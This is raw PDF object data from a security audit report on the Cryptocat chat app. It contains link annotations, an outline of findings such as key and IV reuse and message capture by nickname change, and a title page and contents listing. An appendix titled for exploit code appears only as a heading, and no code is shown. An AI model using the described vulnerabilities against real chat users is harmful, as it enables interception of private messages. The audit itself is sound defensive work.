/XYZ 62.69291 768.5236 0 ] /Rect [ 85.69291 600.7736 164.2039 612.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Page16': class PDFPage 109 0 obj % Page dictionary << /Annots [ 107 0 R 108 0 R ] /Contents 193 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 177 0 R /Resources << /Font 1 0 R /ProcSet [ /PDF /Text /ImageB /ImageC /ImageI ] >> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'Page17': class PDFPage 110 0 obj % Page dictionary << /Contents 194 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 177 0 R /Resources << /Font 1 0 R /ProcSet [ /PDF /Text /ImageB /ImageC /ImageI ] >> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'Annot.NUMBER86': class LinkAnnotation 111 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 88 0 R /XYZ 62.69291 474.0236 0 ] /Rect [ 429.104 402.7736 531.9734 414.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER87': class LinkAnnotation 112 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 88 0 R /XYZ 62.69291 474.0236 0 ] /Rect [ 62.69291 390.7736 98.27291 402.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER88': class PDFDictionary 113 0 obj << /A << /S /URI /Type /Action /URI (https://otr.cypherpunks.ca/Protocol-v3-4.0.0.html) >> /Border [ 0 0 0 ] /Rect [ 257.1003 99.77362 451.2777 111.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Page18': class PDFPage 114 0 obj % Page dictionary << /Annots [ 111 0 R 112 0 R 113 0 R ] /Contents 195 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 177 0 R /Resources << /Font 1 0 R /ProcSet [ /PDF /Text /ImageB /ImageC /ImageI ] >> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'Annot.NUMBER89': class PDFDictionary 115 0 obj << /A << /S /URI /Type /Action /URI (https://github.com/cryptocat/cryptocat/blob/80f41fdfac5ed503d0837d8fa29f6364a73478be/CHANGELOG.md#cryptocat-2114) >> /Border [ 0 0 0 ] /Rect [ 420.7247 636.7736 501.2947 648.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER90': class PDFDictionary 116 0 obj << /A << /S /URI /Type /Action /URI 
(https://github.com/cryptocat/cryptocat/wiki/OTR-Encrypted-File-Transfer-Specification) >> /Border [ 0 0 0 ] /Rect [ 85.69291 288.7736 463.0229 300.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER91': class PDFDictionary 117 0 obj << /A << /S /URI /Type /Action /URI (https://github.com/strophe/strophejs/issues/35) >> /Border [ 0 0 0 ] /Rect [ 85.69291 162.7736 289.1229 174.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER92': class LinkAnnotation 118 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 91 0 R /XYZ 62.69291 768.0236 0 ] /Rect [ 268.6259 150.7736 532.0308 162.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER93': class LinkAnnotation 119 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 91 0 R /XYZ 62.69291 768.0236 0 ] /Rect [ 85.69291 138.7736 148.4929 150.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER94': class LinkAnnotation 120 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 139 0 R /XYZ 62.69291 768.5236 0 ] /Rect [ 172.7429 120.7736 276.4628 132.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Page19': class PDFPage 121 0 obj % Page dictionary << /Annots [ 115 0 R 116 0 R 117 0 R 118 0 R 119 0 R 120 0 R ] /Contents 196 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 177 0 R /Resources << /Font 1 0 R /ProcSet [ /PDF /Text /ImageB /ImageC /ImageI ] >> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'Annot.NUMBER95': class LinkAnnotation 122 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 114 0 R /XYZ 62.69291 213.0236 0 ] /Rect [ 508.1227 369.7736 531.0133 381.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER96': class LinkAnnotation 123 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 114 0 R /XYZ 62.69291 213.0236 0 ] /Rect [ 85.69291 357.7736 190.9209 369.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Page20': class PDFPage 124 0 obj % Page dictionary << /Annots [ 122 0 R 123 0 R ] /Contents 197 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 177 0 R /Resources << /Font 1 0 R /ProcSet [ /PDF 
/Text /ImageB /ImageC /ImageI ] >> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'Annot.NUMBER97': class LinkAnnotation 125 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 99 0 R /XYZ 62.69291 768.0236 0 ] /Rect [ 201.0734 651.7736 530.8486 663.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER98': class LinkAnnotation 126 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 99 0 R /XYZ 62.69291 768.0236 0 ] /Rect [ 85.69291 639.7736 236.3029 651.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER99': class LinkAnnotation 127 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 99 0 R /XYZ 62.69291 768.0236 0 ] /Rect [ 311.7559 579.7736 531.3308 591.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER100': class LinkAnnotation 128 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 99 0 R /XYZ 62.69291 768.0236 0 ] /Rect [ 85.69291 567.7736 337.4429 579.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER101': class LinkAnnotation 129 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 83 0 R /XYZ 62.69291 735.0236 0 ] /Rect [ 495.3527 198.7736 531.4827 210.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER102': class LinkAnnotation 130 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 83 0 R /XYZ 62.69291 735.0236 0 ] /Rect [ 108.6929 186.7736 378.5781 198.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER103': class LinkAnnotation 131 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 86 0 R /XYZ 62.69291 768.0236 0 ] /Rect [ 399.4322 186.7736 531.1886 198.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER104': class LinkAnnotation 132 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 86 0 R /XYZ 62.69291 768.0236 0 ] /Rect [ 108.6929 174.7736 207.0529 186.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Page21': class PDFPage 133 0 obj % Page dictionary << /Annots [ 125 0 R 126 0 R 127 0 R 128 0 R 129 0 R 130 0 R 131 0 R 132 0 R ] /Contents 198 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 177 0 R /Resources << /Font 1 0 
R /ProcSet [ /PDF /Text /ImageB /ImageC /ImageI ] >> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'Page22': class PDFPage 134 0 obj % Page dictionary << /Contents 199 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 177 0 R /Resources << /Font 1 0 R /ProcSet [ /PDF /Text /ImageB /ImageC /ImageI ] >> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'Page23': class PDFPage 135 0 obj % Page dictionary << /Contents 200 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 177 0 R /Resources << /Font 1 0 R /ProcSet [ /PDF /Text /ImageB /ImageC /ImageI ] >> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'Page24': class PDFPage 136 0 obj % Page dictionary << /Contents 201 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 177 0 R /Resources << /Font 1 0 R /ProcSet [ /PDF /Text /ImageB /ImageC /ImageI ] >> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'Annot.NUMBER105': class PDFDictionary 137 0 obj << /A << /S /URI /Type /Action /URI (https://github.com/cryptocat/cryptocat/issues/500) >> /Border [ 0 0 0 ] /Rect [ 62.69291 714.7736 108.8329 726.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER106': class PDFDictionary 138 0 obj << /A << /S /URI /Type /Action /URI (https://github.com/cryptocat/cryptocat/wiki/OTR-Encrypted-File-Transfer-Specification) >> /Border [ 0 0 0 ] /Rect [ 135.9329 384.7736 284.3029 396.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Page25': class PDFPage 139 0 obj % Page dictionary << /Annots [ 137 0 R 138 0 R ] /Contents 202 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 177 0 R /Resources << /Font 1 0 R /ProcSet [ /PDF /Text /ImageB /ImageC /ImageI ] >> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'Annot.NUMBER107': class PDFDictionary 140 0 obj << /A << /S /URI /Type /Action /URI (https://github.com/arlolra/otr/issues/41) >> /Border [ 0 0 0 ] /Rect [ 441.4129 714.7736 503.1029 726.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Page26': class PDFPage 141 0 obj % Page dictionary << /Annots [ 140 0 R ] /Contents 203 0 R /MediaBox [ 0 0 
595.2756 841.8898 ] /Parent 177 0 R /Resources << /Font 1 0 R /ProcSet [ /PDF /Text /ImageB /ImageC /ImageI ] >> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'Page27': class PDFPage 142 0 obj % Page dictionary << /Contents 204 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 177 0 R /Resources << /Font 1 0 R /ProcSet [ /PDF /Text /ImageB /ImageC /ImageI ] >> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'R143': class PDFCatalog 143 0 obj % Document Root << /Outlines 145 0 R /PageLabels 205 0 R /PageMode /UseNone /Pages 177 0 R /Type /Catalog >> endobj % 'R144': class PDFInfo 144 0 obj << /Author () /CreationDate (D:20140126220900+00'00') /Creator (\(unspecified\)) /Keywords () /Producer (ReportLab PDF Library - www.reportlab.com) /Subject (\(unspecified\)) /Title (Report of Security Audit of Cryptocat) >> endobj % 'R145': class PDFOutlines 145 0 obj << /Count 39 /First 146 0 R /Last 176 0 R /Type /Outlines >> endobj % 'Outline.0': class OutlineEntryObject 146 0 obj << /Count 3 /Dest [ 77 0 R /XYZ 62.69291 156.0236 0 ] /First 147 0 R /Last 148 0 R /Next 150 0 R /Parent 145 0 R /Title (Overview) >> endobj % 'Outline.32.0': class OutlineEntryObject 147 0 obj << /Dest [ 82 0 R /XYZ 62.69291 741.0236 0 ] /Next 148 0 R /Parent 146 0 R /Title (Audit Scope) >> endobj % 'Outline.32.1': class OutlineEntryObject 148 0 obj << /Count 1 /Dest [ 82 0 R /XYZ 62.69291 597.0236 0 ] /First 149 0 R /Last 149 0 R /Parent 146 0 R /Prev 147 0 R /Title (Coverage) >> endobj % 'Outline.33.0': class OutlineEntryObject 149 0 obj << /Dest [ 82 0 R /XYZ 62.69291 333.0236 0 ] /Parent 148 0 R /Title (Target Code and Revision) >> endobj % 'Outline.1': class OutlineEntryObject 150 0 obj << /Count 14 /Dest [ 83 0 R /XYZ 62.69291 765.0236 0 ] /First 151 0 R /Last 163 0 R /Next 165 0 R /Parent 145 0 R /Prev 146 0 R /Title (Findings) >> endobj % 'Outline.34.0': class OutlineEntryObject 151 0 obj << /Dest [ 83 0 R /XYZ 62.69291 732.0236 0 ] /Next 152 0 R /Parent 150 0 R /Title (Issue A. 
Disclosure of File Contents Due to Re-use Of Key and IV) >> endobj % 'Outline.34.1': class OutlineEntryObject 152 0 obj << /Dest [ 86 0 R /XYZ 62.69291 765.0236 0 ] /Next 153 0 R /Parent 150 0 R /Prev 151 0 R /Title (Issue B. Integrity Key and IV Reuse in File Transfer) >> endobj % 'Outline.34.2': class OutlineEntryObject 153 0 obj << /Dest [ 88 0 R /XYZ 62.69291 765.0236 0 ] /Next 154 0 R /Parent 150 0 R /Prev 152 0 R /Title (Mitigation for Issues A and B) >> endobj % 'Outline.34.3': class OutlineEntryObject 154 0 obj << /Count 3 /Dest [ 88 0 R /XYZ 62.69291 471.0236 0 ] /First 155 0 R /Last 157 0 R /Next 158 0 R /Parent 150 0 R /Prev 153 0 R /Title (Remediation for Issues A and B) >> endobj % 'Outline.35.0': class OutlineEntryObject 155 0 obj << /Dest [ 88 0 R /XYZ 62.69291 315.0236 0 ] /Next 156 0 R /Parent 154 0 R /Title (Versioning) >> endobj % 'Outline.35.1': class OutlineEntryObject 156 0 obj << /Dest [ 90 0 R /XYZ 62.69291 765.0236 0 ] /Next 157 0 R /Parent 154 0 R /Prev 155 0 R /Title (Generate per-file keys) >> endobj % 'Outline.35.2': class OutlineEntryObject 157 0 obj << /Dest [ 90 0 R /XYZ 62.69291 468.8236 0 ] /Parent 154 0 R /Prev 156 0 R /Title (New standard file transfer protocol) >> endobj % 'Outline.34.4': class OutlineEntryObject 158 0 obj << /Dest [ 91 0 R /XYZ 62.69291 765.0236 0 ] /Next 159 0 R /Parent 150 0 R /Prev 154 0 R /Title (Issue C. Substitution of File Contents By Hijacking Entry in User Interface) >> endobj % 'Outline.34.5': class OutlineEntryObject 159 0 obj << /Dest [ 98 0 R /XYZ 62.69291 765.0236 0 ] /Next 160 0 R /Parent 150 0 R /Prev 158 0 R /Title (Issue D. File Name, Mimetype, and Size Lack Confidentiality) >> endobj % 'Outline.34.6': class OutlineEntryObject 160 0 obj << /Dest [ 99 0 R /XYZ 62.69291 765.0236 0 ] /Next 161 0 R /Parent 150 0 R /Prev 159 0 R /Title (Issue E. 
You Log Out, Attacker Logs in with the same Nickname, Your Friend Thinks The Attacker is You) >> endobj % 'Outline.34.7': class OutlineEntryObject 161 0 obj << /Dest [ 103 0 R /XYZ 62.69291 765.0236 0 ] /Next 162 0 R /Parent 150 0 R /Prev 160 0 R /Title (Issue F. Nicknames Can Be Invisibly Reassigned) >> endobj % 'Outline.34.8': class OutlineEntryObject 162 0 obj << /Dest [ 106 0 R /XYZ 62.69291 765.0236 0 ] /Next 163 0 R /Parent 150 0 R /Prev 161 0 R /Title (Issue G. Capture of Sent Messages by Nickname Change) >> endobj % 'Outline.34.9': class OutlineEntryObject 163 0 obj << /Count 1 /Dest [ 110 0 R /XYZ 62.69291 765.0236 0 ] /First 164 0 R /Last 164 0 R /Parent 150 0 R /Prev 162 0 R /Title (Issues Without Known Exploits) >> endobj % 'Outline.36.0': class OutlineEntryObject 164 0 obj << /Dest [ 110 0 R /XYZ 62.69291 693.0236 0 ] /Parent 163 0 R /Title (CTR-mode Overflow) >> endobj % 'Outline.2': class OutlineEntryObject 165 0 obj << /Count 6 /Dest [ 114 0 R /XYZ 62.69291 765.0236 0 ] /First 166 0 R /Last 171 0 R /Next 172 0 R /Parent 145 0 R /Prev 150 0 R /Title (Future Work) >> endobj % 'Outline.37.0': class OutlineEntryObject 166 0 obj << /Count 4 /Dest [ 114 0 R /XYZ 62.69291 732.0236 0 ] /First 167 0 R /Last 170 0 R /Next 171 0 R /Parent 165 0 R /Title (Protocol Analysis, Design, and Implementation) >> endobj % 'Outline.38.0': class OutlineEntryObject 167 0 obj << /Dest [ 114 0 R /XYZ 62.69291 660.0236 0 ] /Next 168 0 R /Parent 166 0 R /Title (Multiparty Chat) >> endobj % 'Outline.38.1': class OutlineEntryObject 168 0 obj << /Dest [ 114 0 R /XYZ 62.69291 459.0236 0 ] /Next 169 0 R /Parent 166 0 R /Prev 167 0 R /Title (File Transfer) >> endobj % 'Outline.38.2': class OutlineEntryObject 169 0 obj << /Dest [ 114 0 R /XYZ 62.69291 378.0236 0 ] /Next 170 0 R /Parent 166 0 R /Prev 168 0 R /Title (OTR & Cryptographic Libraries) >> endobj % 'Outline.38.3': class OutlineEntryObject 170 0 obj << /Dest [ 114 0 R /XYZ 62.69291 309.0236 0 ] /Parent 166 0 R /Prev 169 0 R 
/Title (JavaScript Cryptography) >> endobj % 'Outline.37.1': class OutlineEntryObject 171 0 obj << /Dest [ 114 0 R /XYZ 62.69291 210.0236 0 ] /Parent 165 0 R /Prev 166 0 R /Title (Open Questions & Concerns) >> endobj % 'Outline.3': class OutlineEntryObject 172 0 obj << /Count 1 /Dest [ 124 0 R /XYZ 62.69291 765.0236 0 ] /First 173 0 R /Last 173 0 R /Next 174 0 R /Parent 145 0 R /Prev 165 0 R /Title (Recommendations) >> endobj % 'Outline.39.0': class OutlineEntryObject 173 0 obj << /Dest [ 124 0 R /XYZ 62.69291 732.0236 0 ] /Parent 172 0 R /Title (Coding Practices) >> endobj % 'Outline.4': class OutlineEntryObject 174 0 obj << /Dest [ 133 0 R /XYZ 62.69291 765.0236 0 ] /Next 175 0 R /Parent 145 0 R /Prev 172 0 R /Title (Appendix A: The life cycle of the Cryptocat file transfer) >> endobj % 'Outline.5': class OutlineEntryObject 175 0 obj << /Dest [ 139 0 R /XYZ 62.69291 765.0236 0 ] /Next 176 0 R /Parent 145 0 R /Prev 174 0 R /Title (Appendix B: Work Log) >> endobj % 'Outline.6': class OutlineEntryObject 176 0 obj << /Dest [ 142 0 R /XYZ 62.69291 765.0236 0 ] /Parent 145 0 R /Prev 175 0 R /Title (Appendix C: Exploit Code for Issue G) >> endobj % 'R177': class PDFPages 177 0 obj % page tree << /Count 27 /Kids [ 8 0 R 77 0 R 82 0 R 83 0 R 85 0 R 86 0 R 88 0 R 90 0 R 91 0 R 95 0 R 98 0 R 99 0 R 102 0 R 103 0 R 106 0 R 109 0 R 110 0 R 114 0 R 121 0 R 124 0 R 133 0 R 134 0 R 135 0 R 136 0 R 139 0 R 141 0 R 142 0 R ] /Type /Pages >> endobj % 'R178': class PDFStream 178 0 obj % page stream << /Length 2108 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 741.0236 cm q 0 0 0 rg BT 1 0 0 1 0 4 Tm /F2 20 Tf 24 TL 58.26488 0 Td (Report of Security Audit of Cryptocat) Tj T* -58.26488 0 Td ET Q Q q 1 0 0 1 62.69291 725.0236 cm Q q 1 0 0 1 62.69291 725.0236 cm Q q 1 0 0 1 62.69291 641.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 69 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 69 cm q BT 1 0 0 1 0 2 Tm 
12 TL /F1 10 Tf 0 0 0 rg (Principal Investigators:) Tj T* ET Q Q q 1 0 0 1 23 63 cm Q q 1 0 0 1 23 63 cm Q q 1 0 0 1 23 51 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (Nathan Wilcox <) Tj 0 0 .501961 rg (nathan@LeastAuthority.com) Tj 0 0 0 rg (>) Tj T* ET Q Q q Q Q q 1 0 0 1 23 45 cm Q q 1 0 0 1 23 33 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (Zooko Wilcox-O'Hearn <) Tj 0 0 .501961 rg (zooko@LeastAuthority.com) Tj 0 0 0 rg (>) Tj T* ET Q Q q Q Q q 1 0 0 1 23 27 cm Q q 1 0 0 1 23 15 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (Daira Hopwood <) Tj 0 0 .501961 rg (daira@LeastAuthority.com) Tj 0 0 0 rg (>) Tj T* ET Q Q q Q Q q 1 0 0 1 23 9 cm Q q 1 0 0 1 23 -3 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (Darius Bacon <) Tj 0 0 .501961 rg (darius@LeastAuthority.com) Tj 0 0 0 rg (>) Tj T* ET Q Q q Q Q q 1 0 0 1 23 -3 cm Q q Q Q q 1 0 0 1 62.69291 641.0236 cm Q endstream endobj % 'R179': class PDFStream 179 0 obj % page stream << /Length 9107 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 744.0236 cm q BT 1 0 0 1 0 3.5 Tm 21 TL /F2 17.5 Tf 0 0 0 rg (Contents) Tj T* ET Q Q q 1 0 0 1 62.69291 168.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 0 555 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 .501961 rg (Overview) Tj T* ET Q Q q 1 0 0 1 397.8898 555 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL 66.44 0 Td (2) 
Tj T* -66.44 0 Td ET Q Q q 1 0 0 1 0 537 cm q BT 1 0 0 1 20 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Audit Scope) Tj T* ET Q Q q 1 0 0 1 397.8898 537 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 66.44 0 Td (3) Tj T* -66.44 0 Td ET Q Q q 1 0 0 1 0 519 cm q BT 1 0 0 1 20 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Coverage) Tj T* ET Q Q q 1 0 0 1 397.8898 519 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 66.44 0 Td (3) Tj T* -66.44 0 Td ET Q Q q 1 0 0 1 0 501 cm q BT 1 0 0 1 40 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Target Code and Revision) Tj T* ET Q Q q 1 0 0 1 397.8898 501 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 66.44 0 Td (3) Tj T* -66.44 0 Td ET Q Q q 1 0 0 1 0 483 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 .501961 rg (Findings) Tj T* ET Q Q q 1 0 0 1 397.8898 483 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL 66.44 0 Td (4) Tj T* -66.44 0 Td ET Q Q q 1 0 0 1 0 465 cm q BT 1 0 0 1 20 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Issue A. Disclosure of File Contents Due to Re-use Of Key and IV) Tj T* ET Q Q q 1 0 0 1 397.8898 465 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 66.44 0 Td (4) Tj T* -66.44 0 Td ET Q Q q 1 0 0 1 0 447 cm q BT 1 0 0 1 20 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Issue B. 
Integrity Key and IV Reuse in File Transfer) Tj T* ET Q Q q 1 0 0 1 397.8898 447 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 66.44 0 Td (6) Tj T* -66.44 0 Td ET Q Q q 1 0 0 1 0 429 cm q BT 1 0 0 1 20 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Mitigation for Issues A and B) Tj T* ET Q Q q 1 0 0 1 397.8898 429 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 66.44 0 Td (7) Tj T* -66.44 0 Td ET Q Q q 1 0 0 1 0 411 cm q BT 1 0 0 1 20 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Remediation for Issues A and B) Tj T* ET Q Q q 1 0 0 1 397.8898 411 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 66.44 0 Td (7) Tj T* -66.44 0 Td ET Q Q q 1 0 0 1 0 393 cm q BT 1 0 0 1 40 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Versioning) Tj T* ET Q Q q 1 0 0 1 397.8898 393 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 66.44 0 Td (7) Tj T* -66.44 0 Td ET Q Q q 1 0 0 1 0 375 cm q BT 1 0 0 1 40 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Generate per-file keys) Tj T* ET Q Q q 1 0 0 1 397.8898 375 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 66.44 0 Td (8) Tj T* -66.44 0 Td ET Q Q q 1 0 0 1 0 357 cm q BT 1 0 0 1 40 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (New standard file transfer protocol) Tj T* ET Q Q q 1 0 0 1 397.8898 357 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 66.44 0 Td (8) Tj T* -66.44 0 Td ET Q Q q 1 0 0 1 0 339 cm q BT 1 0 0 1 20 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Issue C. Substitution of File Contents By Hijacking Entry in User Interface) Tj T* ET Q Q q 1 0 0 1 397.8898 339 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 66.44 0 Td (9) Tj T* -66.44 0 Td ET Q Q q 1 0 0 1 0 321 cm q BT 1 0 0 1 20 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Issue D. 
File Name, Mimetype, and Size Lack Confidentiality) Tj T* ET Q Q q 1 0 0 1 397.8898 321 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (11) Tj T* -60.88 0 Td ET Q Q q 1 0 0 1 0 291 cm q BT 1 0 0 1 20 14 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Issue E. You Log Out, Attacker Logs in with the same Nickname, Your Friend Thinks) Tj T* (The Attacker is You) Tj T* ET Q Q q 1 0 0 1 397.8898 303 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (12) Tj T* -60.88 0 Td ET Q Q q 1 0 0 1 0 273 cm q BT 1 0 0 1 20 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Issue F. Nicknames Can Be Invisibly Reassigned) Tj T* ET Q Q q 1 0 0 1 397.8898 273 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (14) Tj T* -60.88 0 Td ET Q Q q 1 0 0 1 0 255 cm q BT 1 0 0 1 20 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Issue G. Capture of Sent Messages by Nickname Change) Tj T* ET Q Q q 1 0 0 1 397.8898 255 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (15) Tj T* -60.88 0 Td ET Q Q q 1 0 0 1 0 237 cm q BT 1 0 0 1 20 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Issues Without Known Exploits) Tj T* ET Q Q q 1 0 0 1 397.8898 237 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (17) Tj T* -60.88 0 Td ET Q Q q 1 0 0 1 0 219 cm q BT 1 0 0 1 40 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (CTR-mode Overflow) Tj T* ET Q Q q 1 0 0 1 397.8898 219 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (17) Tj T* -60.88 0 Td ET Q Q q 1 0 0 1 0 201 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 .501961 rg (Future Work) Tj T* ET Q Q q 1 0 0 1 397.8898 201 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL 60.88 0 Td (18) Tj T* -60.88 0 Td ET Q Q q 1 0 0 1 0 183 cm q BT 1 0 0 1 20 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Protocol Analysis, Design, and Implementation) Tj T* ET Q Q q 1 0 0 1 397.8898 183 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 
